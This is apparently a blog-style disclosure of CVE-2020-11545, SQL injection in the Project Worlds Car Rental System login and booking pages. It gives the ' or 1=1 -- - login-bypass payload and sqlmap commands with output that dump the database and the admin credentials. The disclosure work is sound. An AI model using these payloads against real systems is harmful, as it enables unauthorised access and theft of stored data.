CVE-2020-11545
Project Worlds Official Car Rental System 1 is vulnerable to multiple SQL injection issues, as demonstrated by below.
Parameter | Filename |
---|---|
– email – pass | account.php |
– uname – pass | login.php |
– id | book_car.php |
Impact: These vulnerabilities allows an attacker to dump the MySQL database and to bypass the login authentication prompt.
Discovering the Vulnerabilities
I installed the Project on my Ubuntu VM using Apache2 and MySQL. There are two different login pages depending on the type of user – customer or administrator. Customers are supposed to login with account.php
, administrators are supposed to login with login.php
. After static code analysis, I saw that the user inputs are not sanitized. Rather, user input is used directly in the query to the SQL database.
I further analyzed the web application, and saw a potential vulnerable URL on book_car.php
. I intercepted the GET request and saved it to a file which I could then import to sqlmap for further testing.
Verifying the Vulnerabilities
account.php
Payload: ' or 1=1 -- -
login.php
Payload: ' or 1=1 -- -
book_car.php
I intercepted the GET request to list the details of the car, and saved it to a file. Following this, I used the sqlmap tool to test for vulnerabilities.
# URL: /book_car.php?id=1
$ sqlmap -r <book_car_request> -o
We are able to use SQLmap to further enumerate the database:
$ sqlmap -r <book_car_request> --current-db
[...]
[11:58:47] [INFO] fetching current database
current database: 'cars'
$ sqlmap -r <book_car_request> -D cars --tables
[...]
Database: cars
[5 tables]
+---------+
| admin |
| cars |
| client |
| hire |
| message |
+---------+
$ sqlmap -r <book_car_request> -D cars -T admin --dump
[...]
Database: cars
Table: admin
[1 entry]
+----------+-------+-------+
| admin_id | pass | uname |
+----------+-------+-------+
| 1 | admin | admin |
+----------+-------+-------+
6 Replies to “CVE-2020-11545”